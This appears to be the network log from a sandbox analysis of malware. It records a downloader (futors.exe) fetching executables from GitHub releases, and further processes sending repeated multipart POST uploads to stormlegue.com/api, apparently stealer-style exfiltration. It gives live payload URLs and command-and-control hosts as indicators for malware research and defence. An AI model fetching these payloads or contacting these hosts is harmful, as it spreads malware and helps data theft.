                                                            Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/933717859/3158e964-6e73-4443-84f8-ddb304d57b87?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T140621Z&X-Amz-Expires=300&X-Amz-Signature=487ada036d4fee7e9dac06aaf740bbe89c05165809ab25321aa99688e66c1ddf&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3D12321321.exe&response-content-type=application%2Foctet-stream
                                                            Cache-Control: no-cache
                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                            X-Frame-Options: deny
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 0
                                                            Referrer-Policy: no-referrer-when-downgrade
                                                            Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                                                            Content-Length: 0
                                                            X-GitHub-Request-Id: D5DD:7439D:213614:271483:67B7373F
                                                          • flag-gb
                                                            GET
                                                            https://github.com/legendary99999/fsdfdsfds/releases/download/sdffdsfsddfs/alex12112.exe
                                                            futors.exe
                                                            Remote address:
                                                            20.26.156.215:443
                                                            Request
                                                            GET /legendary99999/fsdfdsfds/releases/download/sdffdsfsddfs/alex12112.exe HTTP/1.1
                                                            Host: github.com
                                                            Response
                                                            HTTP/1.1 302 Found
                                                            Server: GitHub.com
                                                            Date: Thu, 20 Feb 2025 14:06:25 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                            Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/933910050/851ed480-459a-4e09-83d2-9ce8a09d0744?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T140625Z&X-Amz-Expires=300&X-Amz-Signature=010b55f972f51b1e7b8d3ae2c0f01def68b45456b43bd82364f560462af65176&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dalex12112.exe&response-content-type=application%2Foctet-stream
                                                            Cache-Control: no-cache
                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                            X-Frame-Options: deny
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 0
                                                            Referrer-Policy: no-referrer-when-downgrade
                                                            Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                                                            Content-Length: 0
                                                            X-GitHub-Request-Id: D5DD:7439D:213A72:2719B3:67B73748
                                                          • flag-gb
                                                            GET
                                                            https://github.com/legendary99999/fdfsdfdssfd/releases/download/dfsdfsdfsdsf/fher.exe
                                                            futors.exe
                                                            Remote address:
                                                            20.26.156.215:443
                                                            Request
                                                            GET /legendary99999/fdfsdfdssfd/releases/download/dfsdfsdfsdsf/fher.exe HTTP/1.1
                                                            Host: github.com
                                                            Response
                                                            HTTP/1.1 302 Found
                                                            Server: GitHub.com
                                                            Date: Thu, 20 Feb 2025 14:06:29 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                            Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/935547594/67a4ea0f-a626-4118-b393-80fb7fdc2175?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T140629Z&X-Amz-Expires=300&X-Amz-Signature=6b1a645404ec7d6d4ce2608c9cf6e844ef9be357aa78e861a57e43a6f1481715&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dfher.exe&response-content-type=application%2Foctet-stream
                                                            Cache-Control: no-cache
                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                            X-Frame-Options: deny
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 0
                                                            Referrer-Policy: no-referrer-when-downgrade
                                                            Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                                                            Content-Length: 0
                                                            X-GitHub-Request-Id: D5DD:7439D:213E34:271DF3:67B7374D
                                                          • flag-us
                                                            DNS
                                                            objects.githubusercontent.com
                                                            futors.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            objects.githubusercontent.com
                                                            IN A
                                                            Response
                                                            objects.githubusercontent.com
                                                            IN A
                                                            185.199.109.133
                                                            objects.githubusercontent.com
                                                            IN A
                                                            185.199.108.133
                                                            objects.githubusercontent.com
                                                            IN A
                                                            185.199.110.133
                                                            objects.githubusercontent.com
                                                            IN A
                                                            185.199.111.133
                                                          • flag-us
                                                            DNS
                                                            generalmills.pro
                                                            Bjkm5hE.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            generalmills.pro
                                                            IN A
                                                            Response
                                                          • flag-us
                                                            DNS
                                                            stormlegue.com
                                                            Bjkm5hE.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            stormlegue.com
                                                            IN A
                                                            Response
                                                            stormlegue.com
                                                            IN A
                                                            104.21.96.1
                                                            stormlegue.com
                                                            IN A
                                                            104.21.16.1
                                                            stormlegue.com
                                                            IN A
                                                            104.21.64.1
                                                            stormlegue.com
                                                            IN A
                                                            104.21.48.1
                                                            stormlegue.com
                                                            IN A
                                                            104.21.80.1
                                                            stormlegue.com
                                                            IN A
                                                            104.21.32.1
                                                            stormlegue.com
                                                            IN A
                                                            104.21.112.1
                                                          • flag-us
                                                            POST
                                                            https://stormlegue.com/api
                                                            db484a9c5c.exe
                                                            Remote address:
                                                            104.21.96.1:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 8
                                                            Host: stormlegue.com
                                                            Response
                                                            HTTP/1.1 403 Forbidden
                                                            Date: Thu, 20 Feb 2025 14:07:55 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Frame-Options: SAMEORIGIN
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bDoloV0cT0%2Fq%2FBn5qXzB%2FPUD5AQH7cXP7iu9AazW7QBTTd9yiDaLtMBTWDUOPL3KQSLPopH%2BvskwnkRm7nhuy%2BTypVN1s1h5dsKuiNvu%2FReQ2lCjKYWZxNzo2%2F0K2DKvUw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f10d5ac4acd5c-LHR
                                                          • flag-us
                                                            POST
                                                            https://stormlegue.com/api
                                                            db484a9c5c.exe
                                                            Remote address:
                                                            104.21.96.1:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cookie: __cf_mw_byp=hUMNFIgEzejkvU8Cd_aoUCj1v.0_H1LtLm3qyWa08MY-1740060475-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 43
                                                            Host: stormlegue.com
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:07:55 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=f07skr35tobddasb8dr2g6bvjk; expires=Fri, 21 Feb 2025 14:07:55 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mxcaUea50junJq5ZuAPYorJDHAg1FQW4Wh%2FFh3CuAFacVMfwRGKyHo%2BAIx%2FKlfLoyfiNAwSx9C5twbAEeJs9iH5yqo1Q3vFnVYE6BDKyoO28%2F11Mz%2FCt6W1QOWoLk1KOUA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f10d5dc81cd5c-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=25244&min_rtt=21028&rtt_var=7168&sent=15&recv=13&lost=0&retrans=0&sent_bytes=8350&recv_bytes=1040&delivery_rate=453997&cwnd=256&unsent_bytes=0&cid=e1ff27d0659487de&ts=258&x=0"
                                                          • flag-us
                                                            POST
                                                            https://stormlegue.com/api
                                                            db484a9c5c.exe
                                                            Remote address:
                                                            104.21.96.1:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=SR3JANTEOJG0B
                                                            Cookie: __cf_mw_byp=hUMNFIgEzejkvU8Cd_aoUCj1v.0_H1LtLm3qyWa08MY-1740060475-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 1584
                                                            Host: stormlegue.com
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:07:56 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=ddscl53613e9huhhflhmg8okcb; expires=Fri, 21 Feb 2025 14:07:56 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OIl%2B0uVW5DpCa0vf5NyuWTHErA9asi11dgyjgchOiiSL9JIClS70FegDE3JnZe9eZbybRLeKr19T0c8cAfKNOxCajNkKyDNWq0JasyNgWaRc57QjsEFqawXdfP5QVNYBMQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f10d71e69cd5c-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=24753&min_rtt=21028&rtt_var=6357&sent=19&recv=17&lost=0&retrans=0&sent_bytes=9528&recv_bytes=3050&delivery_rate=453997&cwnd=256&unsent_bytes=0&cid=e1ff27d0659487de&ts=487&x=0"
                                                          • flag-us
                                                            POST
                                                            https://stormlegue.com/api
                                                            db484a9c5c.exe
                                                            Remote address:
                                                            104.21.96.1:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=99WAQXCVFMASEE8
                                                            Cookie: __cf_mw_byp=hUMNFIgEzejkvU8Cd_aoUCj1v.0_H1LtLm3qyWa08MY-1740060475-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 1089
                                                            Host: stormlegue.com
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:07:56 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=a4mkqupsvl07d5ouibm122kcl3; expires=Fri, 21 Feb 2025 14:07:56 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S5liVZ9HjPRqyILXH4dzoHl%2BwI3RvGiCRzzde34SET3PjAinviJWriEhQH%2Fl%2FHV1tSx08SYNcV81eSirm7lt27RH8bVege6Q3munqytD0cHfFW7OWUCA1RJAirF5ZzD9eg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f10d8e8e2cd5c-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=23119&min_rtt=21377&rtt_var=7640&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3063&recv_bytes=1782&delivery_rate=156860&cwnd=252&unsent_bytes=0&cid=4f61f25843d7b1c5&ts=432&x=0"
                                                          • flag-us
                                                            POST
                                                            https://stormlegue.com/api
                                                            db484a9c5c.exe
                                                            Remote address:
                                                            104.21.96.1:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cookie: __cf_mw_byp=hUMNFIgEzejkvU8Cd_aoUCj1v.0_H1LtLm3qyWa08MY-1740060475-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 77
                                                            Host: stormlegue.com
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:07:58 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=qq83tepf1qssve2n5f5tauptvo; expires=Fri, 21 Feb 2025 14:07:58 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=38yxkyZO6QejGYhNd1QSNIcnbwa3BQgirNQLLNWVQ9agIdIC0IbnmKWx9IYswdguIpDzzdugbyqvl%2Fe0e98xr0tQ7ER50b3t%2FRLjx%2F0DlDrF7I8cv0fseKfU62dD%2FlBZyg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f10dbe82346d0-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=22615&min_rtt=21225&rtt_var=6541&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3062&recv_bytes=758&delivery_rate=158986&cwnd=253&unsent_bytes=0&cid=af6b0ef3402731b2&ts=1696&x=0"
                                                          • flag-us
                                                            POST
                                                            https://stormlegue.com/api
                                                            DTQCxXZ.exe
                                                            Remote address:
                                                            104.21.96.1:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 8
                                                            Host: stormlegue.com
                                                            Response
                                                            HTTP/1.1 403 Forbidden
                                                            Date: Thu, 20 Feb 2025 14:07:59 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Frame-Options: SAMEORIGIN
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MNYl4s0%2BG2o0%2FAAbTY1qa0HhyTOAJogCMIPoyyJ3Yuah%2FJJcyt%2B8c5%2FNxwy0pwRJDbfyOMqbT2oWJUvhGuv6ACxwbUdsmF1ujsTQwAwIodrrSxYm6oeFedhP6E3u1C0uAg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f10ef4b4fcd5c-LHR
                                                          • flag-us
                                                            POST
                                                            https://stormlegue.com/api
                                                            DTQCxXZ.exe
                                                            Remote address:
                                                            104.21.96.1:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cookie: __cf_mw_byp=xhiJ7joWUMMX1QwjEd59Oe1obb6m_NIzi1B.h4XSkKk-1740060479-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 55
                                                            Host: stormlegue.com
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:00 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=ra258ipkih7f5plllf2kdp619t; expires=Fri, 21 Feb 2025 14:07:59 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zv6gxjsK%2FTUCBb63ouIkqxgvYwsmDskHVIkGciA2BgH7SDZWu4VJ9oreJGeDJUFJCNL572mynhLD5uVDGn9yJIo8GNXdy4XwhSeJxnPrd45Lu%2FFJ%2B41hmwONiwD4thjeBA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f10ef7b88cd5c-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=23428&min_rtt=21097&rtt_var=5317&sent=14&recv=12&lost=0&retrans=0&sent_bytes=8335&recv_bytes=1056&delivery_rate=429119&cwnd=256&unsent_bytes=0&cid=607dab7cbda56df6&ts=246&x=0"
                                                          • flag-us
                                                            POST
                                                            https://stormlegue.com/api
                                                            DTQCxXZ.exe
                                                            Remote address:
                                                            104.21.96.1:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=W16UJYIQFN75AK
                                                            Cookie: __cf_mw_byp=xhiJ7joWUMMX1QwjEd59Oe1obb6m_NIzi1B.h4XSkKk-1740060479-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 1612
                                                            Host: stormlegue.com
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:00 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=3oql8gee651jsc9k8a3b1ru2pe; expires=Fri, 21 Feb 2025 14:08:00 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tFaUd5DAAZ8HWNGo%2Fx2MYw4zcdCoj750mbJ36qxcRO%2B%2FTfv9vhCR3ZyjTnXEzolVwHx5hai2MtL6%2Bg1hI4dw6Ch1puzoVcSB493xk%2FxSgYgoYVW0qfSaK%2FlX2KPCK5JGgg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f10f0ad02cd5c-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=23128&min_rtt=20972&rtt_var=4588&sent=18&recv=16&lost=0&retrans=0&sent_bytes=9513&recv_bytes=3114&delivery_rate=429119&cwnd=256&unsent_bytes=0&cid=607dab7cbda56df6&ts=432&x=0"
                                                          • flag-us
                                                            POST
                                                            https://stormlegue.com/api
                                                            DTQCxXZ.exe
                                                            Remote address:
                                                            104.21.96.1:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=88M6EEFIM
                                                            Cookie: __cf_mw_byp=xhiJ7joWUMMX1QwjEd59Oe1obb6m_NIzi1B.h4XSkKk-1740060479-0.0.1.1-/api
